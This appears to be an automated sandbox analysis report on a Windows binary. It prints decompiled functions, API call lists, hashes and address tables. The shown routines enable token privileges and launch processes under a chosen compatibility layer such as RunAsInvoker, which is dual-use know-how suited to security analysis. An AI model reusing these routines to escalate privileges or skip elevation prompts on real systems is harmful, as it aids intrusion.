                                                                                                                • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
                                                                                                                				int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* __edi;
                                                                                                                				int _t32;
                                                                                                                				intOrPtr _t33;
                                                                                                                				intOrPtr _t36;
                                                                                                                				signed int _t48;
                                                                                                                				signed int _t58;
                                                                                                                				signed int _t59;
                                                                                                                				void** _t62;
                                                                                                                				void** _t63;
                                                                                                                				signed int* _t66;
                                                                                                                
                                                                                                                				_t66 = __eax;
                                                                                                                				_t32 = wcslen(_a4);
                                                                                                                				_t48 =  *(_t66 + 4);
                                                                                                                				_t58 = _t48 + _t32;
                                                                                                                				_v12 = _t58;
                                                                                                                				_t59 = _t58 + 1;
                                                                                                                				_v8 = _t32;
                                                                                                                				_t33 =  *((intOrPtr*)(_t66 + 0x14));
                                                                                                                				 *(_t66 + 4) = _t59;
                                                                                                                				_t62 = _t66 + 0x10;
                                                                                                                				if(_t59 != 0xffffffff) {
                                                                                                                					E00404951(_t66, _t59, _t62, 2, _t33);
                                                                                                                				} else {
                                                                                                                					free( *_t62);
                                                                                                                				}
                                                                                                                				_t60 =  *(_t66 + 0x1c);
                                                                                                                				_t36 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                                				_t63 = _t66 + 0xc;
                                                                                                                				if( *(_t66 + 0x1c) != 0xffffffff) {
                                                                                                                					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
                                                                                                                				} else {
                                                                                                                					free( *_t63);
                                                                                                                				}
                                                                                                                				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
                                                                                                                				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
                                                                                                                				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
                                                                                                                				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
                                                                                                                				_t30 =  *(_t66 + 0x1c) - 1; // -1
                                                                                                                				return _t30;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • wcslen.MSVCRT ref: 004054EC
                                                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                                  • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                                  • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                                  • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                                • memcpy.MSVCRT ref: 00405556
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 726966127-0
                                                                                                                • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                                • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00405ADF() {
                                                                                                                				void* _t25;
                                                                                                                				signed int _t27;
                                                                                                                				signed int _t29;
                                                                                                                				signed int _t31;
                                                                                                                				signed int _t33;
                                                                                                                				signed int _t50;
                                                                                                                				signed int _t52;
                                                                                                                				signed int _t54;
                                                                                                                				signed int _t56;
                                                                                                                				intOrPtr _t60;
                                                                                                                
                                                                                                                				_t60 =  *0x41c470;
                                                                                                                				if(_t60 == 0) {
                                                                                                                					_t50 = 2;
                                                                                                                					 *0x41c470 = 0x8000;
                                                                                                                					_t27 = 0x8000 * _t50;
                                                                                                                					 *0x41c474 = 0x100;
                                                                                                                					 *0x41c478 = 0x1000;
                                                                                                                					_push( ~(0 | _t60 > 0x00000000) | _t27);
                                                                                                                					L0040B26C();
                                                                                                                					 *0x41c458 = _t27;
                                                                                                                					_t52 = 4;
                                                                                                                					_t29 =  *0x41c474 * _t52;
                                                                                                                					_push( ~(0 | _t60 > 0x00000000) | _t29);
                                                                                                                					L0040B26C();
                                                                                                                					 *0x41c460 = _t29;
                                                                                                                					_t54 = 4;
                                                                                                                					_t31 =  *0x41c474 * _t54;
                                                                                                                					_push( ~(0 | _t60 > 0x00000000) | _t31);
                                                                                                                					L0040B26C();
                                                                                                                					 *0x41c464 = _t31;
                                                                                                                					_t56 = 2;
                                                                                                                					_t33 =  *0x41c478 * _t56;
                                                                                                                					_push( ~(0 | _t60 > 0x00000000) | _t33);
                                                                                                                					L0040B26C();
                                                                                                                					 *0x41c45c = _t33;
                                                                                                                					return _t33;
                                                                                                                				}
                                                                                                                				return _t25;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1033339047-0
                                                                                                                • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                                • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Executed Functions

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
                                                                                                                				void* _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                				void* __esi;
                                                                                                                				_Unknown_base(*)()* _t16;
                                                                                                                				_Unknown_base(*)()* _t18;
                                                                                                                				long _t19;
                                                                                                                				_Unknown_base(*)()* _t22;
                                                                                                                				_Unknown_base(*)()* _t24;
                                                                                                                				struct HINSTANCE__** _t35;
                                                                                                                				void* _t37;
                                                                                                                
                                                                                                                				_t37 = __eflags;
                                                                                                                				_t35 = __eax;
                                                                                                                				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
                                                                                                                					return GetLastError();
                                                                                                                				}
                                                                                                                				_t16 = E00408F72(_t35);
                                                                                                                				__eflags = _t16;
                                                                                                                				if(_t16 != 0) {
                                                                                                                					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
                                                                                                                					__eflags = _t24;
                                                                                                                					if(_t24 != 0) {
                                                                                                                						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_v24.PrivilegeCount = 1;
                                                                                                                				_v12 = 2;
                                                                                                                				_a4 = _v8;
                                                                                                                				_t18 = E00408F72(_t35);
                                                                                                                				__eflags = _t18;
                                                                                                                				if(_t18 != 0) {
                                                                                                                					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
                                                                                                                					__eflags = _t22;
                                                                                                                					if(_t22 != 0) {
                                                                                                                						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t19 = GetLastError();
                                                                                                                				FindCloseChangeNotification(_v8); // executed
                                                                                                                				return _t19;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                • API String ID: 616250965-1253513912
                                                                                                                • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
                                                                                                                				WCHAR* _v8;
                                                                                                                				signed int _v12;
                                                                                                                				int _v16;
                                                                                                                				int _v20;
                                                                                                                				char* _v24;
                                                                                                                				int _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				int _v36;
                                                                                                                				int _v40;
                                                                                                                				char _v44;
                                                                                                                				void* _v56;
                                                                                                                				int _v60;
                                                                                                                				char _v92;
                                                                                                                				void _v122;
                                                                                                                				int _v124;
                                                                                                                				short _v148;
                                                                                                                				signed int _v152;
                                                                                                                				intOrPtr _v168;
                                                                                                                				intOrPtr _v172;
                                                                                                                				intOrPtr _v176;
                                                                                                                				intOrPtr _v180;
                                                                                                                				void _v192;
                                                                                                                				char _v196;
                                                                                                                				char _v228;
                                                                                                                				void _v258;
                                                                                                                				int _v260;
                                                                                                                				void _v786;
                                                                                                                				short _v788;
                                                                                                                				void _v1314;
                                                                                                                				short _v1316;
                                                                                                                				void _v1842;
                                                                                                                				short _v1844;
                                                                                                                				void _v18234;
                                                                                                                				short _v18236;
                                                                                                                				char _v83772;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				short* _t174;
                                                                                                                				short _t175;
                                                                                                                				signed int _t176;
                                                                                                                				short _t177;
                                                                                                                				short _t178;
                                                                                                                				int _t184;
                                                                                                                				signed int _t187;
                                                                                                                				intOrPtr _t207;
                                                                                                                				intOrPtr _t219;
                                                                                                                				int* _t252;
                                                                                                                				int* _t253;
                                                                                                                				int* _t266;
                                                                                                                				int* _t267;
                                                                                                                				wchar_t* _t270;
                                                                                                                				int _t286;
                                                                                                                				void* _t292;
                                                                                                                				void* _t304;
                                                                                                                				WCHAR* _t308;
                                                                                                                				WCHAR* _t310;
                                                                                                                				intOrPtr* _t311;
                                                                                                                				int _t312;
                                                                                                                				WCHAR* _t315;
                                                                                                                				void* _t325;
                                                                                                                				void* _t328;
                                                                                                                
                                                                                                                				_t304 = __edx;
                                                                                                                				E0040B550(0x1473c, __ecx);
                                                                                                                				_t286 = 0;
                                                                                                                				 *_a4 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				_v16 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				memset( &_v192, 0, 0x40);
                                                                                                                				_v60 = 0;
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				_v24 = 0;
                                                                                                                				_v40 = 0;
                                                                                                                				_v28 = 0;
                                                                                                                				_v36 = 0;
                                                                                                                				_v32 = 0x100;
                                                                                                                				_v44 = 0;
                                                                                                                				_v1316 = 0;
                                                                                                                				memset( &_v1314, 0, 0x208);
                                                                                                                				_v788 = 0;
                                                                                                                				memset( &_v786, 0, 0x208);
                                                                                                                				_t315 = _a8;
                                                                                                                				_t328 = _t325 + 0x24;
                                                                                                                				_v83772 = 0;
                                                                                                                				_v196 = 0x44;
                                                                                                                				E00404923(0x104,  &_v788, _t315);
                                                                                                                				if(wcschr(_t315, 0x25) != 0) {
                                                                                                                					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
                                                                                                                				}
                                                                                                                				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
                                                                                                                					_v8 = _t286;
                                                                                                                					_v1844 = _t286;
                                                                                                                					memset( &_v1842, _t286, 0x208);
                                                                                                                					_t328 = _t328 + 0xc;
                                                                                                                					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
                                                                                                                					if(_v1844 != _t286) {
                                                                                                                						E00404923(0x104,  &_v788,  &_v1844);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t308 =  &(_t315[0x2106]);
                                                                                                                				if( *_t308 == _t286) {
                                                                                                                					E00404B5C( &_v1316,  &_v788);
                                                                                                                					__eflags = _v1316 - _t286;
                                                                                                                					_t315 = _a8;
                                                                                                                					_pop(_t292);
                                                                                                                					if(_v1316 == _t286) {
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					goto L10;
                                                                                                                				} else {
                                                                                                                					_v20 = _t308;
                                                                                                                					_t270 = wcschr(_t308, 0x25);
                                                                                                                					_pop(_t292);
                                                                                                                					if(_t270 == 0) {
                                                                                                                						L11:
                                                                                                                						_t174 =  &(_t315[0x220e]);
                                                                                                                						if( *_t174 != 1) {
                                                                                                                							_v152 = _v152 | 0x00000001;
                                                                                                                							_v148 =  *_t174;
                                                                                                                						}
                                                                                                                						_t309 = ",";
                                                                                                                						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
                                                                                                                							_v260 = _t286;
                                                                                                                							memset( &_v258, _t286, 0x3e);
                                                                                                                							_v124 = _t286;
                                                                                                                							memset( &_v122, _t286, 0x3e);
                                                                                                                							_v8 = _t286;
                                                                                                                							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
                                                                                                                							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
                                                                                                                							_v152 = _v152 | 0x00000004;
                                                                                                                							_t266 =  &_v260;
                                                                                                                							_push(_t266);
                                                                                                                							L0040B1F8();
                                                                                                                							_v180 = _t266;
                                                                                                                							_t328 = _t328 + 0x3c;
                                                                                                                							_t267 =  &_v124;
                                                                                                                							L0040B1F8();
                                                                                                                							_t292 = _t267;
                                                                                                                							_v176 = _t267;
                                                                                                                						}
                                                                                                                						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
                                                                                                                							_v260 = _t286;
                                                                                                                							memset( &_v258, _t286, 0x3e);
                                                                                                                							_v124 = _t286;
                                                                                                                							memset( &_v122, _t286, 0x3e);
                                                                                                                							_v8 = _t286;
                                                                                                                							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
                                                                                                                							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
                                                                                                                							_v152 = _v152 | 0x00000002;
                                                                                                                							_t252 =  &_v260;
                                                                                                                							_push(_t252);
                                                                                                                							L0040B1F8();
                                                                                                                							_v172 = _t252;
                                                                                                                							_t328 = _t328 + 0x3c;
                                                                                                                							_t253 =  &_v124;
                                                                                                                							_push(_t253);
                                                                                                                							L0040B1F8();
                                                                                                                							_v168 = _t253;
                                                                                                                						}
                                                                                                                						_t310 =  &(_t315[0x105]);
                                                                                                                						if( *_t310 != _t286) {
                                                                                                                							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
                                                                                                                								_push(_t310);
                                                                                                                							} else {
                                                                                                                								_v18236 = _t286;
                                                                                                                								memset( &_v18234, _t286, 0x4000);
                                                                                                                								_t328 = _t328 + 0xc;
                                                                                                                								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
                                                                                                                								_push( &_v18236);
                                                                                                                							}
                                                                                                                							_push( &_v788);
                                                                                                                							_push(L"\"%s\" %s");
                                                                                                                							_push(0x7fff);
                                                                                                                							_push( &_v83772);
                                                                                                                							L0040B1EC();
                                                                                                                							_v24 =  &_v83772;
                                                                                                                						}
                                                                                                                						_t175 = _t315[0x220c];
                                                                                                                						if(_t175 != 0x20) {
                                                                                                                							_v12 = _t175;
                                                                                                                						}
                                                                                                                						_t311 = _a4;
                                                                                                                						if(_t315[0x2254] == 2) {
                                                                                                                							E00401D1E(_t311, L"RunAsInvoker");
                                                                                                                						}
                                                                                                                						_t176 = _t315[0x265c];
                                                                                                                						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
                                                                                                                							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
                                                                                                                						}
                                                                                                                						_t177 = _t315[0x265e];
                                                                                                                						if(_t177 != 1) {
                                                                                                                							__eflags = _t177 - 2;
                                                                                                                							if(_t177 != 2) {
                                                                                                                								goto L37;
                                                                                                                							}
                                                                                                                							_push(L"16BITCOLOR");
                                                                                                                							goto L36;
                                                                                                                						} else {
                                                                                                                							_push(L"256COLOR");
                                                                                                                							L36:
                                                                                                                							E00401D1E(_t311);
                                                                                                                							L37:
                                                                                                                							if(_t315[0x2660] == _t286) {
                                                                                                                								__eflags = _t315[0x2662] - _t286;
                                                                                                                								if(_t315[0x2662] == _t286) {
                                                                                                                									__eflags = _t315[0x2664] - _t286;
                                                                                                                									if(_t315[0x2664] == _t286) {
                                                                                                                										__eflags = _t315[0x2666] - _t286;
                                                                                                                										if(_t315[0x2666] == _t286) {
                                                                                                                											L46:
                                                                                                                											_t178 = _t315[0x2a6e];
                                                                                                                											_t358 = _t178 - 3;
                                                                                                                											if(_t178 != 3) {
                                                                                                                												__eflags = _t178 - 2;
                                                                                                                												if(_t178 != 2) {
                                                                                                                													__eflags =  *_t311 - _t286;
                                                                                                                													if( *_t311 == _t286) {
                                                                                                                														_push(_t286);
                                                                                                                													} else {
                                                                                                                														_push(_t311);
                                                                                                                													}
                                                                                                                													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
                                                                                                                													L63:
                                                                                                                													_t293 = _t311;
                                                                                                                													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
                                                                                                                													_t312 = _t184;
                                                                                                                													if(_t312 == _t286 && _v60 != _t286) {
                                                                                                                														_t363 = _t315[0x266c] - _t286;
                                                                                                                														if(_t315[0x266c] != _t286) {
                                                                                                                															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
                                                                                                                															_a4 = _a4 | 0xffffffff;
                                                                                                                															_a8 = _t286;
                                                                                                                															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
                                                                                                                															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
                                                                                                                														}
                                                                                                                													}
                                                                                                                													E004055D1(_t184,  &_v44);
                                                                                                                													return _t312;
                                                                                                                												}
                                                                                                                												E00405497( &_v92);
                                                                                                                												E00405497( &_v228);
                                                                                                                												E0040149F(__eflags,  &_v92);
                                                                                                                												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
                                                                                                                												E00401551( &_v228, _t304, __eflags,  &_v92);
                                                                                                                												_t204 = _a4;
                                                                                                                												__eflags =  *_a4;
                                                                                                                												if(__eflags != 0) {
                                                                                                                													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
                                                                                                                												}
                                                                                                                												E00401421( &_v44, _t304,  &_v92, __eflags);
                                                                                                                												_t207 = _v28;
                                                                                                                												__eflags = _t207;
                                                                                                                												_v16 = 0x40c4e8;
                                                                                                                												if(_t207 != 0) {
                                                                                                                													_v16 = _t207;
                                                                                                                												}
                                                                                                                												_v12 = _v12 | 0x00000400;
                                                                                                                												E004054B9( &_v228);
                                                                                                                												E004054B9( &_v92);
                                                                                                                												_t286 = 0;
                                                                                                                												__eflags = 0;
                                                                                                                												L58:
                                                                                                                												_t315 = _a8;
                                                                                                                												_t311 = _a4;
                                                                                                                												goto L63;
                                                                                                                											}
                                                                                                                											E00405497( &_v92);
                                                                                                                											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
                                                                                                                											_t359 =  *_t311 - _t286;
                                                                                                                											if( *_t311 != _t286) {
                                                                                                                												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
                                                                                                                											}
                                                                                                                											E00401421( &_v44, _t304,  &_v92, _t359);
                                                                                                                											_t219 = _v28;
                                                                                                                											_v16 = 0x40c4e8;
                                                                                                                											if(_t219 != _t286) {
                                                                                                                												_v16 = _t219;
                                                                                                                											}
                                                                                                                											_v12 = _v12 | 0x00000400;
                                                                                                                											E004054B9( &_v92);
                                                                                                                											goto L58;
                                                                                                                										}
                                                                                                                										_push(L"HIGHDPIAWARE");
                                                                                                                										L45:
                                                                                                                										E00401D1E(_t311);
                                                                                                                										goto L46;
                                                                                                                									}
                                                                                                                									_push(L"DISABLEDWM");
                                                                                                                									goto L45;
                                                                                                                								}
                                                                                                                								_push(L"DISABLETHEMES");
                                                                                                                								goto L45;
                                                                                                                							}
                                                                                                                							_push(L"640X480");
                                                                                                                							goto L45;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
                                                                                                                					L10:
                                                                                                                					_v20 =  &_v1316;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                			}

































































                                                                                                                0x00402630
                                                                                                                0x00402630
                                                                                                                0x0040263a
                                                                                                                0x0040263b
                                                                                                                0x00402646
                                                                                                                0x0040264b
                                                                                                                0x0040264c
                                                                                                                0x0040265a
                                                                                                                0x0040265a
                                                                                                                0x0040265d
                                                                                                                0x00402666
                                                                                                                0x00402668
                                                                                                                0x00402668
                                                                                                                0x00402672
                                                                                                                0x00402675
                                                                                                                0x0040267e
                                                                                                                0x0040267e
                                                                                                                0x00402683
                                                                                                                0x0040268b
                                                                                                                0x0040269e
                                                                                                                0x0040269e
                                                                                                                0x004026a3
                                                                                                                0x004026ac
                                                                                                                0x004026b5
                                                                                                                0x004026b8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004026ba
                                                                                                                0x00000000
                                                                                                                0x004026ae
                                                                                                                0x004026ae
                                                                                                                0x004026bf
                                                                                                                0x004026c1
                                                                                                                0x004026c6
                                                                                                                0x004026cc
                                                                                                                0x004026d5
                                                                                                                0x004026db
                                                                                                                0x004026e4
                                                                                                                0x004026ea
                                                                                                                0x004026f3
                                                                                                                0x004026f9
                                                                                                                0x00402707
                                                                                                                0x00402707
                                                                                                                0x0040270d
                                                                                                                0x00402710
                                                                                                                0x0040276d
                                                                                                                0x00402770
                                                                                                                0x0040280b
                                                                                                                0x0040280e
                                                                                                                0x00402813
                                                                                                                0x00402810
                                                                                                                0x00402810
                                                                                                                0x00402810
                                                                                                                0x00402819
                                                                                                                0x0040281f
                                                                                                                0x00402836
                                                                                                                0x00402841
                                                                                                                0x00402846
                                                                                                                0x0040284a
                                                                                                                0x00402851
                                                                                                                0x00402857
                                                                                                                0x00402860
                                                                                                                0x00402865
                                                                                                                0x00402876
                                                                                                                0x00402879
                                                                                                                0x00402888
                                                                                                                0x00402888
                                                                                                                0x00402857
                                                                                                                0x00402891
                                                                                                                0x0040289c
                                                                                                                0x0040289c
                                                                                                                0x00402779
                                                                                                                0x00402784
                                                                                                                0x0040278d
                                                                                                                0x004027a4
                                                                                                                0x004027b3
                                                                                                                0x004027b8
                                                                                                                0x004027bb
                                                                                                                0x004027bf
                                                                                                                0x004027c6
                                                                                                                0x004027c6
                                                                                                                0x004027d1
                                                                                                                0x004027d6
                                                                                                                0x004027d9
                                                                                                                0x004027db
                                                                                                                0x004027e2
                                                                                                                0x004027e4
                                                                                                                0x004027e4
                                                                                                                0x004027e7
                                                                                                                0x004027f4
                                                                                                                0x004027fc
                                                                                                                0x00402801
                                                                                                                0x00402801
                                                                                                                0x00402803
                                                                                                                0x00402803
                                                                                                                0x00402806
                                                                                                                0x00000000
                                                                                                                0x00402806
                                                                                                                0x00402715
                                                                                                                0x00402729
                                                                                                                0x0040272e
                                                                                                                0x00402731
                                                                                                                0x00402738
                                                                                                                0x00402738
                                                                                                                0x00402743
                                                                                                                0x00402748
                                                                                                                0x0040274d
                                                                                                                0x00402754
                                                                                                                0x00402756
                                                                                                                0x00402756
                                                                                                                0x00402759
                                                                                                                0x00402763
                                                                                                                0x00000000
                                                                                                                0x00402763
                                                                                                                0x004026fb
                                                                                                                0x00402700
                                                                                                                0x00402702
                                                                                                                0x00000000
                                                                                                                0x00402702
                                                                                                                0x004026ec
                                                                                                                0x00000000
                                                                                                                0x004026ec
                                                                                                                0x004026dd
                                                                                                                0x00000000
                                                                                                                0x004026dd
                                                                                                                0x004026ce
                                                                                                                0x00000000
                                                                                                                0x004026ce
                                                                                                                0x004026ac
                                                                                                                0x00402443
                                                                                                                0x0040246a
                                                                                                                0x00402470
                                                                                                                0x00000000
                                                                                                                0x00402470

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402300
                                                                                                                • memset.MSVCRT ref: 0040233E
                                                                                                                • memset.MSVCRT ref: 00402356
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                • wcschr.MSVCRT ref: 00402387
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                  • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                  • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                • wcschr.MSVCRT ref: 004023B7
                                                                                                                • memset.MSVCRT ref: 004023D9
                                                                                                                • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                • wcschr.MSVCRT ref: 0040242B
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                • memset.MSVCRT ref: 004024BE
                                                                                                                • memset.MSVCRT ref: 004024D1
                                                                                                                • _wtoi.MSVCRT ref: 00402519
                                                                                                                • _wtoi.MSVCRT ref: 0040252B
                                                                                                                • memset.MSVCRT ref: 00402561
                                                                                                                • memset.MSVCRT ref: 00402574
                                                                                                                • _wtoi.MSVCRT ref: 004025BC
                                                                                                                • _wtoi.MSVCRT ref: 004025CE
                                                                                                                • wcschr.MSVCRT ref: 004025F0
                                                                                                                • memset.MSVCRT ref: 0040260F
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                                • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
